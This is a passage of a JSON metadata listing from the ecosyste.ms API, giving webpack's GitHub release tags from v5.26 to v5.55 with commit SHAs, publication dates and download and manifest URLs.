ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","publ